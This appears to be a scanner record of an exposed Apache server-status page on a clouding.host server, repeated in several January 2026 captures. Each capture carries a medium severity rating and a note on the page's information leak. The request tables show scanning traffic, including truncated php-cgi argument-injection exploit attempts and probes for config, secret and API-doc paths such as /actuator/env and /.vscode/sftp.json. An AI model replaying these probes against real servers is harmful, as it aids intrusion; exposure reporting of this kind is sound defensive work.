streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-435641150/1/74_ 0.9730028184620.00.010.94 152.53.239.248http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-435641150/3/78_ 1.283010113690.00.001.16 162.158.123.73h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-435641150/1/71_ 1.113050149050.00.001.56 162.158.120.206h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-435641150/2/75_ 1.322991178000.00.011.99 108.162.245.35h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-435641160/48/150_ 6.1431371980.07.799.75 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-435641160/41/134_ 6.1220402520.022.2824.29 152.53.239.248http/1.1cinre.tandemhse.com:443GET / HTTP/1.1 3-435641160/39/144_ 5.993577411930.00.749.15 167.71.81.114h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 3-435641160/36/125_ 6.1400335110.07.8716.38 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-435641160/38/124_ 6.1410259360.00.623.20 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-435641160/43/136_ 6.14026265010.00.661.49 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 3-435641160/47/137_ 6.114658284050.07.699.75 172.70.194.170h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-435641160/33/132_ 6.08432302120.07.509.60 188.26.211.26h2pre.relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-435641160/39/114_ 6.062369287870.00.841.98 172.70.43.55h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-435641160/38/131_ 6.1420266000.01.035.18 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 4-435641170/5/512_ 0.9730501269930.00.065.71 172.203.190.132h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-435641170/2/462_ 1.12305701324730.00.018.50 185.226.32.97http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-435641170/2/573_ 1.093013331295020.00.017.12 172.69.224.105h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-435641170/4/626_ 1.42101245190.00.067.75 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 4-435641170/2/563_ 1.3230601300060.00.007.35 108.162.245.49h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-435641170/3/487_ 1.2230101282990.00.6715.05 172.68.174.104h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-435641170/2/705_ 1.27001193810.00.019.21 162.158.123.58h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-435641170/4/470_ 1.42
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e3e94c1d37
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 09-Jan-2026 12:51:11 CET Restart Time: Wednesday, 31-Dec-2025 22:29:29 CET Parent Server Config. Generation: 129 Parent Server MPM Generation: 128 Server uptime: 8 days 14 hours 21 minutes 42 seconds Server load: 0.08 0.10 0.06 Total accesses: 148374 - Total Traffic: 5.0 GB - Total Duration: 115308523 CPU Usage: u90.55 s69.63 cu1015.07 cs783.33 - .264% CPU load .2 requests/sec - 7.0 kB/second - 35.1 kB/request - 777.148 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01944614no0yes010000 11944748no2yes010000 21944617no0yes010000 31944615no1yes010000 41944616no2yes19001 Sum505 149001 ________________________________________W_________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-12819446140/61/2798_ 17.171648216391810.01.8489.45 172.71.146.121h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-12819446140/67/2732_ 17.3915013010160.010.3593.17 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 0-12819446140/61/2764_ 17.395018726940.02.6775.94 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-12819446140/49/2765_ 17.3818015196370.036.24121.74 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 0-12819446140/57/2779_ 16.681421624828710.01.2296.61 188.114.111.93h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-12819446140/64/2674_ 17.3816014244010.08.4879.10 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 0-12819446140/59/2722_ 17.382117467410.013.9789.43 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-12819446140/58/2728_ 17.191030213350.03.9780.34 172.70.215.32h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-12819446140/58/2723_ 17.394042412140.01.7873.54 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-12819446140/45/2670_ 16.2917014609920.07.79121.30 162.158.42.8h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-12819447480/200/2616_ 27.5411015585130.015.0791.45 147.182.149.75http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-12819447480/225/2693_ 27.561216123170310.014.88120.69 143.110.217.244http/1.1 1-12819447480/231/2598_ 27.6212019177500.013.99139.38 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 1-12819447480/214/2686_ 27.6313034799010.019.2196.01 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 1-12819447480/208/2597_ 27.5517118395930.05.9070.98 147.182.149.75http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-12819447480/220/2589_ 27.6312011864110.014.1893.79 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 1-12819447480/218/2654_ 27.401728936501420.027.30111.30 162.158.90.159h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-12819447480/232/2658_ 27.6311039754760.025.04109.50 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 1-12819447480/207/2578_ 27.637014321520.018.50118.36 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-12819447480/236/2606_ 27.637018132640.014.7995.36 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 2-12819446170/39/3124_ 14.1716043557590.01.5668.44 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 2-12819446170/44/3102_ 14.1721125937700.00.5976.15 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-12819446170/39/3087_ 13.0716024466600.01.16101.44 172.68.159.122h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-12819446170/42/3169_ 14.0510811214247170.07.87128.88 64.227.70.2http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-12819446170/37/3120_ 14.12110029412570.01.0986.90 147.182.149.75http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /_all_dbs HTTP/1.1 2-12819446170/43/3222_ 13.9321027333270.00.7366.13 172.64.217.216h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-12819446170/44/3096_ 14.121535622401560.01.2470.77 162.158.41.242h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-12819446170/35/3131_ 13.96110021108710.01.5081.86 172.70.206.108h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-12819446170/43/3108_ 13.471072220845980.01.29123.42 172.68.134.212h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-12819446170/50/3186_ 14.1717016526440.09.7395.01 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 3-12819446150/252/3195_ 29.295037856670.032.98101.48 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-12819446150/235/3179_ 29.26031315701210.06.99101.99 172.69.166.116h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-12819446150/249/3147_ 29.275119019380.014.43108.87 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-12819446150/246/3217_ 29.300016984400.026.40142.37 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-12819446150/259/3222_ 29.301027792390.030.57143.50 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-12819446150/246/3165_ 29.298022841210.015.1889.14 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-12819446150/249/3194_ 29.26071627696640.010.47102.10 172.70.100.108h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-12819446150/232/3155_ 29.300061830060.032.34121.44 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-12819446150/252/3137_ 29.303053870060.037.76145.28 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-12819446150/245/3191_ 29.24530136502320.06.8487.89 167.71.175.236http/1.1 4-12819446160/86/3197W 18.580019605880.03.99114.23 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-12819446160/111/3068_ 18.58217414350530.04.0772.05 104.23.166.181h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-12819446160/96/3144_ 18.482111687620.04.22101.75 147.182.149.75http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-12819446160/86/3138_ 18.580011308460.010.28100.87 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 4-12819446160/97/3136_ 18.573015130470.017.34108.14 167.71.175.236http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@v
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e35d5866e9
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 03-Jan-2026 08:58:33 CET Restart Time: Wednesday, 31-Dec-2025 22:29:29 CET Parent Server Config. Generation: 25 Parent Server MPM Generation: 24 Server uptime: 2 days 10 hours 29 minutes 4 seconds Server load: 0.05 0.03 0.00 Total accesses: 40450 - Total Traffic: 1000.2 MB - Total Duration: 24668966 CPU Usage: u23.94 s22.87 cu244.6 cs200.37 - .234% CPU load .192 requests/sec - 4981 B/second - 25.3 kB/request - 609.863 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01832732no0yes010000 11832735no0yes010000 21832733no0yes010000 31832734no1yes010001 41832866no0yes19000 Sum501 149001 ________________________________________W_________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2418327320/130/302_ 8.8700667140.01.835.18 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 0-2418327320/143/307_ 8.8520630330.02.265.30 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 0-2418327320/149/313_ 8.8520564110.02.2016.96 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-2418327320/139/304_ 8.8580582060.01.884.89 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-2418327320/127/270_ 8.8460481410.03.566.64 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/graphql HTTP/1.1 0-2418327320/134/281_ 8.8570528180.02.326.43 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 0-2418327320/133/289_ 8.8570665610.07.7610.36 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 0-2418327320/134/291_ 8.601015540830.01.784.86 152.53.251.244http/1.1 0-2418327320/134/286_ 8.8590571820.03.176.15 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-2418327320/129/279_ 8.8610457870.01.484.87 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-2418327350/11/567_ 4.97101893560.00.1613.64 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 1-2418327350/6/586_ 4.98108225530.00.3229.12 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-2418327350/10/595_ 3.92114010890540.00.2532.93 198.211.108.173http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-2418327350/11/601_ 4.984015688820.00.2018.37 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-2418327350/7/598_ 3.916995760300.00.0611.94 52.147.68.81http/1.1barrerasdecontencion.com:443GET /wp-admin/maint/chosen.php HTTP/1.1 1-2418327350/11/594_ 4.981402021340.00.0715.77 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 1-2418327350/14/604_ 4.9713117828640.00.2533.30 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-2418327350/12/621_ 4.988011269890.00.1834.73 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-2418327350/11/596_ 4.972003389280.00.2328.48 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 1-2418327350/6/614_ 4.531905994790.00.4124.91 172.71.172.234h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2418327330/5/724_ 4.58302089690.00.0111.72 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/graphql HTTP/1.1 2-2418327330/3/725_ 4.251102331550.00.0012.34 162.158.122.94h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2418327330/3/695_ 4.59402147570.00.1124.36 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-2418327330/7/724_ 4.58202017970.00.0314.91 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/gql HTTP/1.1 2-2418327330/4/705_ 4.552102087800.00.0514.40 157.230.19.140http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 2-2418327330/7/732_ 4.581202321640.00.2012.42 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 2-2418327330/7/695_ 4.581101933950.00.329.62 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 2-2418327330/4/727_ 4.262102252890.00.4113.57 162.158.122.104h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-2418327330/10/703_ 4.59501945810.00.3728.56 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-2418327330/3/727_ 4.271002104240.00.0015.08 162.158.122.88h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2418327340/5/779_ 5.04901827160.00.0715.53 157.230.19.140http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /info.php HTTP/1.1 3-2418327340/7/773_ 5.06702195770.00.2913.56 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-2418327340/8/789_ 5.061002190440.00.0714.41 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-2418327340/5/809_ 5.06401870700.00.4019.13 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 3-2418327340/10/801_ 4.75302513940.00.7018.10 162.158.122.56h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2418327340/7/768_ 4.721202039680.00.0714.18 104.22.23.56h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-2418327340/8/781_ 5.06601981180.00.0612.43 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-2418327340/7/808_ 4.734039356350.00.2236.08 103.196.9.204http/1.1 3-2418327340/11/778_ 5.07101826970.00.0722.05 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-2418327340/11/795_ 5.06812110110.00.4712.34 103.196.9.204http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-2418328660/83/1709W 8.91005234580.01.5142.51 165.227.173.41http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 4-2418328660/91/1601_ 8.94807500550.01.5425.35 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 4-2418328660/98/1634_ 8.93005234340.01.4443.67 104.164.126.10http/1.1 4-2418328660/83/1662_ 8.94416056070.01.5329.46 104.164.126.10http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-2418328660/84/1667_ 8.94209765640.01.2527.07 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-2418328660/87/1622_ 8.94309260990.01.1223.11 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-2418328660/108/1691_ 8.934010
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e30f6c7498
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Friday, 02-Jan-2026 03:26:36 CET Restart Time: Wednesday, 31-Dec-2025 22:29:29 CET Parent Server Config. Generation: 10 Parent Server MPM Generation: 9 Server uptime: 1 day 4 hours 57 minutes 7 seconds Server load: 0.02 0.03 0.00 Total accesses: 17773 - Total Traffic: 515.3 MB - Total Duration: 9440643 CPU Usage: u34.57 s29.94 cu88.08 cs74.05 - .217% CPU load .171 requests/sec - 5.1 kB/second - 29.7 kB/request - 531.179 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01815231no0yes010000 11815232no0yes010000 21815233no1yes010000 31815234no1yes010000 41815365no0yes19000 Sum502 149000 _________________________________________________W Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-918152310/32/89_ 8.291614389192130.01.752.57 104.23.168.64h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-918152310/32/85_ 7.607514112910.00.461.87 162.158.91.25h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-918152310/30/85_ 5.981609091180.012.8513.74 104.23.190.11h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-918152310/31/91_ 7.726295141810.00.391.93 172.70.211.56h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-918152310/29/77_ 7.9116080107510.00.972.07 185.247.137.102http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 0-918152310/28/78_ 7.581761086050.00.653.01 162.158.123.25h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-918152310/30/76_ 7.741760306229360.00.301.56 162.158.108.8h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-918152310/30/89_ 8.9180110160.00.241.46 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-918152310/30/76_ 8.211766189110160.00.431.04 172.70.208.104h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-918152310/39/87_ 8.9180123360.01.672.85 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 1-918152320/14/242_ 7.4422483481013870.00.237.14 104.23.166.113h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-918152320/17/242_ 7.3822600965840.00.555.84 162.158.123.41h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-918152320/16/253_ 7.492249183991830.01.1328.09 162.158.91.77h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-918152320/10/255_ 8.50190927820.00.026.11 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 1-918152320/16/246_ 8.50100724500.00.416.38 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-918152320/14/252_ 7.762254169890960.00.102.78 172.70.206.65h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-918152320/11/250_ 7.48226017962890.00.0927.09 172.68.134.15h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-918152320/15/257_ 7.7118782952220.013.2620.35 172.64.217.106h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-918152320/16/244_ 7.752265299826980.00.265.05 172.71.103.38h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-918152320/17/264_ 7.3690834350.013.4319.62 188.114.111.95h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-918152330/86/354_ 11.94701197020.01.936.14 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-918152330/85/362_ 11.4443381507390.01.577.85 108.162.246.216h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-918152330/80/335_ 10.9519231261840.01.866.35 188.114.111.97h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-918152330/80/363_ 11.94132611183760.01.709.24 172.69.176.9h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-918152330/78/336_ 11.94131931077560.01.926.34 172.69.176.9h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-918152330/86/357_ 11.932001328320.01.317.48 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 2-918152330/80/344_ 11.59811143990.01.705.62 162.158.42.23h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-918152330/78/342_ 11.0371631342100.02.727.91 162.158.91.121h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-918152330/88/347_ 11.932241197260.06.049.24 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-918152330/77/364_ 10.61222861211800.02.6110.87 104.23.166.184h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-918152340/183/345_ 13.0910815850.04.246.66 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-918152340/195/358_ 12.9311901141620.04.328.08 172.71.127.13h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-918152340/189/339_ 13.0873781184480.03.236.45 172.71.232.31h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-918152340/194/356_ 13.10219930040.01.9313.19 188.114.111.97h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-918152340/185/345_ 13.12201501580.03.3712.01 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-918152340/188/331_ 13.10301067780.03.377.09 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 3-918152340/190/349_ 13.11601108010.04.437.87 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-918152340/189/345_ 13.113038266280.03.2815.09 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-918152340/190/355_ 13.1120914380.01.735.32 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-918152340/193/352_ 13.09701088800.02.986.78 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-918153650/254/790_ 15.132102278220.03.6222.94 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/gql HTTP/1.1 4-918153650/231/714_ 15.0121212065740.02.7113.85 162.158.120.205h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-918153650/236/705_ 15.15002320820.04.2731.20 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-918153650/252/757_ 15.1111242929580.04.4914.16 172.68.135.87h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-918153650/265/775_ 15.141102531750.04.0914.97 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 4-918153650/233/726_ 15.131302026110.02.3612.03 207.154.212.47
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e32f8afd66
